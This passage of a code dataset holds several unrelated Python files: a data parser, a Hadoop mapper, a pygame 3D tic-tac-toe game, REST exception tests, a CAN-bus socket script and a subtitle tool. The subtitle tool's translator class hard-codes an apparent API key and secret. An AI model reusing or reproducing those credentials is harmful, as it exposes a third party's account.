n\n","repo_name":"RJaikanth/torch-cv","sub_path":"torchcv/preprocessing/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2326923229","text":"'''\nTo parse h-data files\n'''\n\nimport os\nimport matplotlib.pyplot as plt\n\nadvFracs = [0.25,0.33]\nprocs = [5.0,7.5]\nzValues = [10, 15, 20]\ncvals = [x for x in range(100,1,-5)]\n\ndef parseFileZ(fileName, resultData):\n\tif os.path.exists(fileName):\n\t\tfile = open(fileName, \"r\")\n\t\tdata = file.readlines()\n\n\t\tfor dataItem in data:\n\t\t\tinfo = dataItem.split(\" \")\n\t\t\tadvFrac = float(info[0])\n\t\t\ttau = float(info[1])\n\t\t\tzList = info[2].split(\",\")\n\t\t\tzDict = {}\n\t\t\tfor zItem in zList:\n\t\t\t\tcontent = zItem.split(\":\")\n\t\t\t\tkey = int(content[0])\n\t\t\t\tvalue = float(content[1])\n\t\t\t\tzDict[key]=value\n\t\t\t\n\t\t\tif advFrac not in resultData:\n\t\t\t\tresultData[advFrac] = {}\n\t\t\tresultData[advFrac][tau]=zDict\n\telse:\n\t\tprint(fileName,\" file not found!!\")\n\ndef parseFileH(fileName, resultData):\n\tif os.path.exists(fileName):\n\t\tfile = open(fileName, \"r\")\n\t\tdata = file.readlines()\n\n\t\tfor dataItem in data:\n\t\t\tinfo = dataItem.split(\" \")\n\t\t\ttau = float(info[0])\n\t\t\tzeta = int(info[1])\n\t\t\tprobList = info[2].split(\",\")\n\t\t\tprobs = {}\n\t\t\tfor prob in probList:\n\t\t\t\tcontent = prob.split(\":\")\n\t\t\t\tkey = int(content[0])\n\t\t\t\tvalue = float(content[1])\n\t\t\t\tprobs[key]=value\n\n\t\t\tif tau not in resultData:\n\t\t\t\tresultData[tau]={}\n\t\t\tprint(tau,zeta)\n\t\t\tresultData[tau][zeta] = probs\n\telse:\n\t\tprint(fileName,\" file not found!!\")\n\n\nfileName = os.environ[\"HOME\"]+\"/EVD-Expt/scripts/z-data-min\"\nresultDataZ = {}\nfilez = open(\"z-data.csv\", \"w+\")\nfilez.write(\"c,25-50,25-75,33-50,33-75\\n\")\n\nparseFileZ(fileName, resultDataZ)\nfor c in cvals:\n\tfilez.write(str(c))\n\tfor tau in procs:\n\t\tfor adv in advFracs:\n\t\t\tif c not in resultDataZ[adv][tau]:\n\t\t\t\tfilez.write(\",\")\n\t\t\telse:\n\t\t\t\tfilez.write(\",\"+str(resultDataZ[adv][tau][c]))\n\tfilez.write(\"\\n\")\nexit()\n\ndirPath = os.environ[\"HOME\"]+\"/EVD-Expt/scripts/\"\nfileNames = ['h-data']\nresultDataH = {}\nfor file in fileNames:\n\tfilePath = dirPath+file\n\tparseFileH(filePath, resultDataH)\n\nfile = open(\"h-data.csv\", \"w+\")\nfile.write(\"c,10-75,15-75,20-75\\n\")\nproc = 7.5 \n\nfor c in cvals:\n\tfile.write(str(c))\n\tfor z in zValues:\n\t\tfile.write(\",\"+str(resultDataH[proc][z][c]))\n\tfile.write(\"\\n\")\n\n","repo_name":"nitinawathare/EVDExperimentSetup","sub_path":"scripts/hDataParse.py","file_name":"hDataParse.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35144310087","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"mapper.py\"\"\"\nimport sys\n\n\"\"\"\nExample of matrix-vector multiplication:\n\nM = [[1, 2, 3],\n     [4, 5, 6],\n     [7, 8, 9]]\n\nv.T = [[1],\n       [1], \n       [1]]\n\nM * v = [6, 15, 24]\n\nM[i][j] * v[j]\n\nExample data for Map Reduce:\n1 0 4\n0 0 1\n1 1 2\n2 2 1\n0 2 10\n1 2 6\n0 1 2\n2 1 8\n2 0 5\n*\n1 2 3\n=\n35 26 24\n\"\"\"\n\n\ndef main():\n    \"\"\"\n    Processes stdin lines of the form 'i j mij' and emits 'i: mij * v[j]'.\n\n    i (int): row index of the matrix element\n    j (int): column index of the matrix element\n    mij (float): value of the matrix element\n    \"\"\"\n\n    \"\"\"\n
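    A matching reduce step (a hypothetical companion script, not part of this file)\n    would sum the emitted values per row key i to obtain (M*v)[i], e.g.:\n\n        # reducer.py sketch; assumes mapper output lines formatted as 'i: value'\n        totals = {}\n        for line in sys.stdin:\n            key, value = line.split(':')\n            totals[int(key)] = totals.get(int(key), 0.0) + float(value)\n        for key in sorted(totals):\n            print(f'{key}: {totals[key]}')\n\n    In this 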
basic algorithm the vector is supposed to be \n    loaded into memory. For simplicity we hardcode it here.\n    \"\"\"\n    v = [3, 5, 5, 0, 9, 0, 8, 2, 8, 4, 1, 6, 9, 1, 7, 5, 8, 4, 4, 6]\n\n    for line in sys.stdin:\n        line = line.strip()\n        data = line.split()\n\n        i, j = int(data[0]), int(data[1])\n        mij = float(data[2])\n\n        key = i\n        value = mij * v[j]\n\n        print(f'{key}: {value}')\n\n\nif __name__ == '__main__':\n    main()\n\n\n","repo_name":"vseredovych/BigData","sub_path":"matrix-vector-multiplication/hadoop/simple/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39391919440","text":"import pygame\nfrom math import *\nimport struct\nimport sys\nimport time\nimport random\nimport threading\n\nimport pg3d\nimport gui\nimport game\n\n\ndef mainMenu():\n    pass\n    \ndef runGame(screen, ttt, pfont, bfont, cam): #ttt is the board object\n    motionMatrix = { # 1 = in direction, -1 opposite direction, 0 = no motion\n        \"forward\": 0,\n        \"lateral\": 0,\n        \"vertical\": 0,\n        \"rotational\": 0\n    }\n    \n    mspeeed = 2\n    \n    blist = []\n    \n    colors = [(230,230,230),(200,200,200),(170,170,170),(140,140,140)]\n    \n    space = 20\n    for cz in range(0, 4):\n        for cy in range(0, 4):\n            for cx in range(0, 4):\n                if (cy) % 2 == 0:\n                    if (cy + cz + cx) % 2 == 0:\n                        color = colors[0]\n                    else:\n                        color = colors[1]\n                else:\n                    if (cy + cz + cx) % 2 == 0:\n                        color = colors[2]\n                    else:\n                        color = colors[3]\n                blist.append(game.cell(pg3d.point(cx * space, cy * space, cz * space), 10, color, (cx + cy * 4 + cz * 16)))\n    \n    light = []\n    \n    #cam = pg3d.camera(pg3d.point(0,0, -75), [0,0,0], pg3d.point(0,0,1000)) #camera object\n    s = pg3d.scene(screen, cam, blist, light)\n    \n    fps = 0\n    \n    #usernum = 0\n    locked = True\n    run = True\n    winner = None\n    \n    def doBotLogic():\n        nonlocal run\n        nonlocal winner\n        \n        while run:\n            time.sleep(0.1)\n            if ttt.currentPlayer.type == 1 and winner == None: #if it is a bot's turn\n                cellNum = ttt.currentPlayer.doBlockingMove()\n                blist[cellNum].occupied = True\n                blist[cellNum].changeColor(ttt.currentPlayer.color)\n                \n                if ttt.testWin():\n                    winner = ttt.currentPlayer\n                \n                ttt.gotoNextPlayer()\n            \n            if ttt.boardstate == 0xffffffffffffffff and winner == None:\n                winner = False\n            \n    logicThread = threading.Thread(target = doBotLogic)\n    logicThread.start()\n    while run == True:\n        startloop = time.time()\n        \n        mxcenter = int(screen.get_width()/2)\n        mycenter = int(screen.get_height()/2)\n        \n        if locked:\n            pygame.mouse.set_pos(mxcenter,mycenter)\n        \n        m = pygame.mouse.get_rel()\n        \n        if m[0] != 0 and abs(m[0]) < 300: #if the mouse moved, move camera\n            cam.orientation[1] -= radians(m[0]/10)\n        if m[1] != 0 and abs(m[1]) < 300:\n            cam.orientation[0] -= radians(m[1]/10)\n        \n        for event in pygame.event.get(): #pygame event detection\n            if event.type == pygame.QUIT:\n                run = False\n                sys.exit(0)\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_ESCAPE:\n                    locked = False\n                    pygame.mouse.set_visible(True)\n                    pygame.event.set_grab(False)\n                \n                if event.key == pygame.K_SPACE and winner != None:\n                    run = False\n                \n                # motionMatrix entries are signed speeds per axis: set to +/-mspeeed while a\n                # movement key is held, and reset to 0 in the KEYUP handler below\n                if event.key == pygame.K_w:\n                    motionMatrix[\"forward\"] = 1 * mspeeed\n                elif event.key == pygame.K_s:\n                    motionMatrix[\"forward\"] = -1 * mspeeed\n                elif event.key == pygame.K_a:\n                    motionMatrix[\"lateral\"] = 1 * mspeeed\n                elif event.key == pygame.K_d:\n                    motionMatrix[\"lateral\"] = -1 * mspeeed\n                elif event.key == pygame.K_r:\n                    motionMatrix[\"vertical\"] = -1 * mspeeed\n                elif event.key == pygame.K_f:\n                    
motionMatrix[\"vertical\"] = 1 * mspeeed\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_w:\n motionMatrix[\"forward\"] = 0\n elif event.key == pygame.K_s:\n motionMatrix[\"forward\"] = 0\n elif event.key == pygame.K_a:\n motionMatrix[\"lateral\"] = 0\n elif event.key == pygame.K_d:\n motionMatrix[\"lateral\"] = 0\n elif event.key == pygame.K_r:\n motionMatrix[\"vertical\"] = 0\n elif event.key == pygame.K_f:\n motionMatrix[\"vertical\"] = 0\n \n if event.type == pygame.MOUSEBUTTONDOWN:\n if locked and winner == None:\n plist = []\n \n for p in s.polygons: #get closest polygon to mouse\n if p.insidePolygon2D(s.camera, mxcenter, mycenter, (mxcenter,mycenter)):\n plist.append(p)\n \n plist.sort(key = lambda x: x.getDistance(s.camera))\n \n if plist and ttt.currentPlayer.type == 0: #if it is a human's turn\n #validmove = ttt.makeMove(usernum, plist[0].parent.numToBin())\n validmove = ttt.currentPlayer.makeMove(plist[0].parent.numToBin())\n \n if validmove:\n plist[0].parent.changeColor(ttt.currentPlayer.color)\n plist[0].parent.occupied = True\n \n if ttt.testWin():\n winner = ttt.currentPlayer\n \n #print(ttt.currentPlayer.getWinningSequences(2))\n ttt.gotoNextPlayer()\n \n else:\n locked = True\n pygame.mouse.set_visible(False)\n pygame.event.set_grab(True)\n \n if ttt.boardstate == 0xffffffffffffffff and winner == None:\n winner = False\n \n #apply camera translation\n s.camera.position.z += motionMatrix[\"forward\"] * cos(cam.orientation[1])\n s.camera.position.x += motionMatrix[\"forward\"] * sin(cam.orientation[1])\n s.camera.position.y -= motionMatrix[\"forward\"] * sin(cam.orientation[0])\n s.camera.position.x += motionMatrix[\"lateral\"] * sin(cam.orientation[1] + radians(90))\n s.camera.position.z += motionMatrix[\"lateral\"] * cos(cam.orientation[1] + radians(90))\n s.camera.position.y += motionMatrix[\"vertical\"]\n \n screen.fill((0,0,0)) #clear for next frame\n \n s.drawPaintedRaster(False) #draw polygons in reverse depth order\n \n frames = pfont.render(\"{} fps\".format(round(fps,1)),True, (255,255,255))\n \n if winner == None:\n toptext = bfont.render(\"{}'s Turn\".format(ttt.currentPlayer.name), True, ttt.currentPlayer.color)\n else:\n if winner == False:\n toptext = bfont.render(\"Draw\", True, (255, 255, 255))\n else:\n toptext = bfont.render(\"{} Wins!\".format(winner.name), True, winner.color)\n \n bottomtext = bfont.render(\"Press SPACE to Continue\", True, (255, 255, 255))\n brect = bottomtext.get_rect(center = (mxcenter, screen.get_height() - 25))\n screen.blit(bottomtext, brect)\n \n trect = toptext.get_rect(center = (mxcenter, 25))\n screen.blit(frames, (10, 10))\n screen.blit(toptext, trect)\n \n #draw crosshair\n chsize = 15\n pygame.draw.line(screen, (255, 255, 255), (mxcenter - chsize, mycenter), (mxcenter + chsize, mycenter), 1)\n pygame.draw.line(screen, (255, 255, 255), (mxcenter, mycenter - chsize), (mxcenter, mycenter + chsize), 1)\n \n pygame.display.flip()\n \n #print(\"{}ms\".format((time.time() - startloop) * 100))\n fps = 1/(time.time() - startloop + 0.01)\n\ndef main(argv):\n pygame.init()\n \n pygame.display.set_caption(\"3D Tic Tac Toe\")\n screen = pygame.display.set_mode([1280,720], pygame.RESIZABLE)\n pygame.mouse.set_visible(False)\n pygame.event.set_grab(True)\n \n pfont = pygame.font.SysFont(\"Consolas\", 14)\n bfont = pygame.font.SysFont(\"Arial\", 32)\n \n cam = pg3d.camera(pg3d.point(0,0, -75), [0,0,0], pg3d.point(0,0,1000))\n \n \n while True:\n #ttt = game.board([game.player(\"Player 1\", (255,0,0)), game.bot(\"Player 2\", 
(0,0,255)), game.bot(\"Player 3\", (0,255,0)), game.bot(\"Player 4\", (255,255,0))], 0)\n ttt = game.board([game.bot(\"Player 1\", (255,0,0), 4), game.player(\"Player 2\", (0,0,255))], 0)\n runGame(screen, ttt, pfont, bfont, cam)\n\nif __name__ == \"__main__\":\n main(sys.argv)","repo_name":"meslane/3DTicTacToe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21481358843","text":"# -*- coding: utf-8 -*-\n\"\"\"Various tests for checking exceptions in views.\"\"\"\nimport pytest\n\nimport copy\nimport logging\n\nimport colander\n\nimport simplejson as json\n\nfrom webtest.app import AppError\n\nfrom moe.tests.optimal_learning.python.gaussian_process_test_case import GaussianProcessTestCase\nfrom moe.tests.views.rest_test_case import RestTestCase\nfrom moe.views.constant import ALL_REST_MOE_ROUTES, GP_MEAN_VAR_ENDPOINT, GP_NEXT_POINTS_EPI_ENDPOINT\nfrom moe.views.exceptions import general_error, failed_colander_validation\nfrom moe.views.gp_next_points_pretty_view import GpNextPointsPrettyView\nfrom moe.views.rest.gp_mean_var import GpMeanVarView\nfrom moe.views.schemas.gp_next_points_pretty_view import GpNextPointsRequest\nfrom moe.views.schemas.rest.gp_mean_var import GpMeanVarRequest\nfrom moe.views.utils import _make_gp_from_params\n\n\n@pytest.fixture(autouse=True, scope='module')\ndef disable_logging(request):\n \"\"\"Disable logging (for the duration of this test case).\"\"\"\n logging.disable(logging.CRITICAL)\n\n def finalize():\n \"\"\"Re-enable logging (so other test cases are unaffected).\"\"\"\n logging.disable(logging.NOTSET)\n request.addfinalizer(finalize)\n\n\nclass TestRestGaussianProcessWithExceptions(GaussianProcessTestCase, RestTestCase):\n\n \"\"\"Test that proper errors are thrown when endpoints bad data.\"\"\"\n\n def test_empty_json_payload_invalid(self):\n \"\"\"Test empty json payload causes an AppError.\"\"\"\n for moe_route in ALL_REST_MOE_ROUTES:\n with pytest.raises(AppError):\n self.testapp.post(moe_route.endpoint, {})\n\n def test_badly_formed_json_payload_invalid(self):\n \"\"\"Test malformed json payload causes a ValueError.\"\"\"\n truth_result = self.testapp.post(GP_MEAN_VAR_ENDPOINT, '}', expect_errors=True)\n for moe_route in ALL_REST_MOE_ROUTES:\n test_result = self.testapp.post(moe_route.endpoint, '}', expect_errors=True)\n assert truth_result.body == test_result.body\n\n def test_invalid_hyperparameters_input(self):\n \"\"\"Test that invalid hyperparameters (via GP_MEAN_VAR_ENDPOINT) generate expected Response with error message.\"\"\"\n endpoint = GP_MEAN_VAR_ENDPOINT\n dict_payload = copy.deepcopy(GpMeanVarView._pretty_default_request)\n\n # Invalidate a hyperparameter\n dict_payload['covariance_info']['hyperparameters'][0] *= -1.0\n result = self.testapp.post(endpoint, json.dumps(dict_payload), expect_errors=True)\n\n # Get the colander exception that arises from processing invalid hyperparameters\n request_schema = GpMeanVarRequest()\n\n with pytest.raises(colander.Invalid) as request_exception:\n request_schema.deserialize(dict_payload)\n\n assert result.body == failed_colander_validation(request_exception.value, result.request).body\n\n def test_invalid_points_sampled_input(self):\n \"\"\"Test that duplicate points_sampled (via GP_NEXT_POINTS_EPI_ENDPOINT) generate expected Response with error message.\"\"\"\n endpoint = GP_NEXT_POINTS_EPI_ENDPOINT\n dict_payload = 
copy.deepcopy(GpNextPointsPrettyView._pretty_default_request)\n\n # Invalidate historical info: 0.0 noise and add a duplicate point\n for sample_point in dict_payload['gp_historical_info']['points_sampled']:\n sample_point['value_var'] = 0.0\n\n dict_payload['gp_historical_info']['points_sampled'].append(dict_payload['gp_historical_info']['points_sampled'][0])\n result = self.testapp.post(endpoint, json.dumps(dict_payload), expect_errors=True)\n\n # Get the exception that arises from processing invalid hyperparameters\n request_schema = GpNextPointsRequest()\n params = request_schema.deserialize(dict_payload)\n\n with pytest.raises(Exception) as request_exception:\n _make_gp_from_params(params)\n\n assert result.body == general_error(request_exception.value, result.request).body\n","repo_name":"Yelp/MOE","sub_path":"moe/tests/views/exceptions_test.py","file_name":"exceptions_test.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":1307,"dataset":"github-code","pt":"32"} +{"seq_id":"14511700734","text":"from socket import *\nfrom libcanbadger import EthernetMessage, EthernetMessageType, ActionType\nimport struct\nimport sys\nimport time\nimport matplotlib.pyplot as plt\nimport statistics\n\n\nclass BroadcastDeafSocket(socket):\n def __init__(self, family, type):\n super().__init__(family, type)\n self.cant_hear = 'CB|'.encode('ascii')\n\n def recvfrom(self, bufsize: int):\n while True:\n resp, add = super().recvfrom(bufsize)\n\n if resp[0:3] != self.cant_hear:\n return resp, add\n\n def recv(self, bufsize: int) -> bytes:\n while True:\n resp = super().recv(bufsize)\n if resp[0:3] != self.cant_hear:\n return resp\n\n\ndef print_formatted_log(data, count):\n print('\\n' + f'Log Message {count}' + '\\n' + '---------------')\n if data[0] == 0x15:\n print('Interface : 1\\n')\n elif data[0] == 0x16:\n print('Interface : 2\\n')\n else:\n print('Interface ERROR!\\n')\n\ndef print_statistics(values, name, ns = None, bins = None):\n print(f\"\\n{name} stats:\\n-----------------------\")\n\n # print median and mean\n mean = statistics.mean(values)\n print(f\"Median: {statistics.median(values)}\")\n print(f\"Mean: {mean}\")\n\n # biggest buckets\n if ns is not None and bins is not None:\n biggest = [i for i, j in enumerate(ns) if j == max(ns)]\n print(f\"\\nBiggest bucket(s) for {name} (measured {len(values)} times):\")\n for i in biggest:\n print(f\"{ns[i]:.0f} in {bins[i]:.3f}-{bins[i+1]:.3f}\")\n\n # outliers\n if ns is not None and bins is not None:\n bucket_indices = [i for i, j in enumerate(ns) if j > 0]\n leftmost = bucket_indices[0]\n rightmost = bucket_indices[-1]\n print(f\"Outliers: {ns[leftmost]:.0f} in {bins[leftmost]:.3f}-{bins[leftmost+1]:.3f} \"\n f\"(> {(mean - bins[leftmost+1]):.3f} from mean) || \"\n f\"{ns[rightmost]:.0f} in {bins[rightmost]:.3f}-{bins[rightmost+1]:.3f} \"\n f\"(> {(bins[rightmost] - mean):.3f} from mean)\")\n\n\n# script vars\ncanbadger_ip = '10.0.0.125'\n\n\ntcp_sock = socket(AF_INET, SOCK_STREAM)\ntcp_sock.bind(('', 13372))\ntcp_sock.listen(1)\n\n\n\n# extra udp socket to send CONNECT over udp\nconn_sock = socket(AF_INET, SOCK_DGRAM)\nconn_sock.bind(('', 13370))\n\n# connection request\nconn_sock.sendto(EthernetMessage(EthernetMessageType.CONNECT, ActionType.NO_TYPE, 4, struct.pack(' 4:\n print(self.cache)\n raise ValueError\n self.cache = []\n\n def read_file(self, path):\n with open(path, 'r', encoding='UTF-8') as f:\n lines = f.readlines()\n for line in lines:\n self.process_line(line)\n print('Srt File 
Loaded!')\n\n def print_len(self):\n print('self.number: ', len(self.number))\n print('self.timeline: ', len(self.timeline))\n print('self.chinese: ', len(self.chinese))\n print('self.english: ', len(self.english))\n\n def revise_num(self):\n length = len(self.number)\n self.number = [str(_) for _ in range(1, length + 1)]\n\n def str2time(self, time_str):\n t = time_str.split(',')\n t_0, t_1 = t[0].split(':'), [t[1]]\n t = t_0 + t_1\n t = [int(_) for _ in t]\n time_sec = 3600 * t[0] + 60 * t[1] + t[2] + t[3] / 1000\n return time_sec\n\n def time2str(self, time_sec):\n time_list = [0, 0, 0, 0]\n t = math.modf(time_sec)\n t_0, t_1 = int(t[0] * 1000), t[1]\n time_list[3] = t_0\n time_list[0] = math.floor(t_1 / 3600)\n t_1 = t_1 % 3600\n time_list[1] = math.floor(t_1 / 60)\n t_1 = t_1 % 60\n time_list[2] = math.floor(t_1)\n return '%02d:%02d:%02d,%03d' % (time_list[0], time_list[1], time_list[2], time_list[3])\n\n def revise_time(self):\n time_line = []\n for timestep in self.timeline:\n t_s, t_e = [self.str2time(_) for _ in timestep.split(self.TIME_SEP)]\n time_line.append(t_s)\n time_line.append(t_e)\n length_t = len(time_line)\n count = 0\n while count < length_t - 1:\n if time_line[count] > time_line[count + 1]:\n time_line[count] = time_line[count + 1]\n count += 1\n count = 0\n while count < length_t - 2:\n time_line[count + 1] = time_line[count + 2] - 0.03\n count += 2\n count = 0\n while count < length_t - 1:\n t_s = self.time2str(time_line[count])\n t_e = self.time2str(time_line[count + 1])\n t_str = '%s%s%s' % (t_s, self.TIME_SEP, t_e)\n self.timeline[math.floor(count / 2)] = t_str\n count += 2\n\n def revise_all(self):\n self.revise_num()\n self.revise_time()\n\n def revise_chinese_length(self, line_length=26):\n count, length = 0, len(self.chinese)\n while count < length:\n line = self.chinese[count]\n if len(line) > line_length:\n temp = jieba.cut(line)\n c_t, line = 0, ''\n for _ in temp:\n line += _\n c_t += len(_)\n if c_t >= line_length:\n line += '\\\\n'\n c_t = 0\n self.chinese[count] = line\n count += 1\n\n def translate(self, start=0, end=None):\n length = len(self.number)\n if end is None:\n end = length\n count = start\n while count < end:\n self.chinese[count] = self.translator.connect(self.english[count])\n count += 1\n time.sleep(0.5)\n print('Translate complete!')\n\n def write_file(self, path):\n with open(path, 'w', encoding='UTF-8') as f:\n length = len(self.number)\n count = 0\n while count < length:\n f.write(self.number[count] + '\\n')\n f.write(self.timeline[count] + '\\n')\n f.write(self.chinese[count] + '\\n')\n f.write(self.english[count] + '\\n')\n f.write('\\n')\n count += 1\n print('Revised Srt File Created!')\n\n\nclass Translator:\n def __init__(self):\n self.API = 'http://openapi.youdao.com/api'\n self.header = {}\n self.APP_KEY = '3d427783a4e1ba7d'\n self.APP_SECRET = 'NVWeIqTR1vHObxNclVYcvLqj6HidkYwN'\n\n def encrypt(self, signStr):\n hash_algorithm = hashlib.sha256()\n hash_algorithm.update(signStr.encode('utf-8'))\n return hash_algorithm.hexdigest()\n\n def truncate(self, q):\n if q is None:\n return None\n size = len(q)\n return q if size <= 20 else q[0:10] + str(size) + q[size - 10:size]\n\n def do_request(self, data):\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n return requests.post(self.API, data=data, headers=headers)\n\n def connect(self, q):\n data = {}\n data['from'] = 'EN'\n data['to'] = 'zh-CHS'\n data['signType'] = 'v3'\n curtime = str(int(time.time()))\n data['curtime'] = curtime\n salt = str(uuid.uuid1())\n 
signStr = self.APP_KEY + self.truncate(q) + salt + curtime + self.APP_SECRET\n sign = self.encrypt(signStr)\n data['appKey'] = self.APP_KEY\n data['q'] = q\n data['salt'] = salt\n data['sign'] = sign\n\n response = self.do_request(data)\n # print(response.content)\n res = json.loads(response.text)['translation']\n print(res)\n return res[0]\n\n\nif __name__ == '__main__':\n ROOT = os.getcwd()\n file_path = os.path.join(ROOT, 'data', 'version2.2.txt')\n save_path = os.path.join(ROOT, 'result', 'version2.3.srt')\n srt_obj = SrtRevisor()\n srt_obj.read_file(file_path)\n srt_obj.print_len()\n srt_obj.revise_all()\n srt_obj.revise_chinese_length()\n # srt_obj.translate(15)\n srt_obj.write_file(save_path)\n","repo_name":"guoqunabc/SubtitleProccesor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6268720201","text":"import numpy\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import LinearLocator\nfrom matplotlib import cm\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\npaddle_dist = 1\nposition_x = []\nposition_y = []\nvelocity_y = []\ntime = []\n\n\nposition_x = [0]*10000\nposition_y = [0]*10000\nvelocity_y = [0]*10000\n\nvelocity_x = 0.1\n\n\ntime = [0]*10000\n\n\nposition_y[0] = paddle_dist/2\n#paddle_norm_x = round(np.cos(angle),2)\n#paddle_norm_y = round(np.sin(angle),2)\n\n\n#result_angle_x = -(2*(direction_x*paddle_norm_x + direction_y*paddle_norm_y)*paddle_norm_x - direction_x)\n#result_angle_y = (2*(direction_x*paddle_norm_x + direction_y*paddle_norm_y)*paddle_norm_y - direction_y)\n\nincrement = 0.01\n\nfor i in range(1, 100):\n time[i] = time[i-1] + increment\n velocity_y[i] = velocity_y[i-1] +(9.81)*time[i]\n\n position_x[i] = position_x[i-1] + velocity_x*time[i]\n position_y[i] = position_y[i-1] + velocity_y[i]*time[i]\n \n\n \n print(position_y[i])\n\n\n\nfig, axs = plt.subplots(2)\naxs[0].set_title('X vs Y distance')\naxs[0].set_xlabel(\"X distance\")\naxs[0].set_ylabel(\"Y distance \")\naxs[0].plot(position_x, position_y, label=\"ball\")\n\naxs[0].legend()\naxs[0].legend(loc=\"lower left\")\n\n\nplt.tight_layout()\nplt.show()\n","repo_name":"BenLevy7/ME303_PingPong","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29946858862","text":"import os\nimport ocr\nimport config as configFile\n\n# import cv2\n\nconfig = configFile.general_config\n\n\n# ----- Tools ----- #\n\n\n# ? 
未完成\ndef writeFile(text, fileName=\"text.txt\"):\n print(\"@dev正在写入文件...\")\n\n # check if the output location is set and sanitize it\n if(config[\"text_output_location\"] == \"\"):\n print(\"请在config.py中设置text_output_location\")\n return\n if(config[\"text_output_location\"].endswith(\"/\")):\n config[\"text_output_location\"] = config[\"text_output_location\"][:-1]\n \n if(not os.path.exists(config[\"text_output_location\"])):\n os.mkdir(config[\"text_output_location\"]\n )\n \n open(config[\"text_output_location\"] + \"/\" + fileName.replace('/', ''), \"w\").write(text)\n print(text)\n print(\"@dev写入完成, 文件已保存到\" + config[\"text_output_location\"] + \"/\" + fileName.replace('/', ''))\n\n\n#\ndef shell(cmd):\n \"\"\"run shell command, print and return the output\"\"\"\n print(os.popen(cmd).read())\n\n\n# ------------------ #\n\n\ndef main():\n print(\"歡迎使用python 版NovelSnap OCR\")\n # screenshotOCRLoop()\n writeFile(ocr.ocr(\"./cache/screen.png\"))\n print(\"感謝使用\")\n\n\n# ? 未完成\n# take a screenshot and do OCR\ndef screenshotOCRLoop(fileName=\"screen\"):\n imgPath = getScreenshot(fileName + \".png\")\n text = ocr.ocr(imgPath)\n writeFile(text)\n\n\ndef getScreenshot(fileName=\"screen.png\"):\n \"\"\"capture screen on phone using adb, pull it to local,\n clean the screenshot on phone, and return the path of the screenshot.\n Args:\n fileName: the name of the screenshot file, default is \"screen.png\"\n Returns:\n the path of the screenshot\n \"\"\"\n\n print(\"@dev正在截图...\")\n shell(\"adb shell screencap -p \" + config[\"cache_location_android\"] + \"/\" + fileName)\n shell(\n \"adb pull \"\n + config[\"cache_location_android\"]\n + \"/\"\n + fileName\n + \" \"\n + config[\"cache_location_pc\"]\n + \"/\"\n + fileName\n )\n shell(\"adb shell rm \" + config[\"cache_location_android\"] + \"/\" + fileName)\n print(\"@dev截图完成, 图片已缓存到\" + config[\"cache_location_pc\"] + \"/\" + fileName)\n return config[\"cache_location_pc\"] + \"/\" + fileName\n\n\nmain()\n","repo_name":"lingo34/NovelSnap-OCR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71401132570","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import leastsq, curve_fit\nfrom pathlib import Path\nfrom math import isclose\n\nPath.cwd()\n\ndata1 = np.loadtxt('count55.txt')\ntresh1 = data1[:, 0]/75\ncount1 = data1[:, 1]\ndata1[:,0]= data1[:, 0]/75\n\ndata2 = np.loadtxt('count56.txt')\ntresh2 = data2[:, 0]/118\ncount2 = data2[:, 1]\ndata2[:,0] = data2[:, 0]/118\n\ndata3 = np.loadtxt('count57.txt')\ntresh3 = data3[:, 0]/138\ncount3 = data3[:, 1]\ndata3[:,0] = data3[:, 0]/138\n\ndata4 = np.loadtxt('count58.txt')\ntresh4 = data4[:, 0]/175\ncount4= data4[:, 1]\ndata4[:,0] = data4[:, 0]/175\n\n\ndata5 = np.loadtxt('count59.txt')\ntresh5 = data5[:, 0]/205\ncount5 = data5[:, 1]\ndata5[:,0] = data5[:, 0]/205\n\n\ndatatef1 = np.loadtxt('counttef55.txt')\ntreshtef1 = datatef1[:, 0]/75\ncounttef1 = datatef1[:, 1]\ndatatef1[:,0]= datatef1[:, 0]/75\n\n\ndatatef2 = np.loadtxt('counttef56.txt')\ntreshtef2 = datatef2[:, 0]/118\ncounttef2 = datatef2[:, 1]\ndatatef2[:,0] = datatef2[:, 0]/118\n\n\ndatatef3 = np.loadtxt('counttef57.txt')\ntreshtef3 = datatef3[:, 0]/138\ncounttef3 = datatef3[:, 1]\ndatatef3[:,0] = datatef3[:, 0]/138\n\n\ndatatef4 = np.loadtxt('counttef58.txt')\ntreshtef4 = datatef4[:, 0]/175\ncounttef4= datatef4[:, 1]\ndatatef4[:,0] = datatef4[:, 0]/175\n\n\ndatatef5 = 
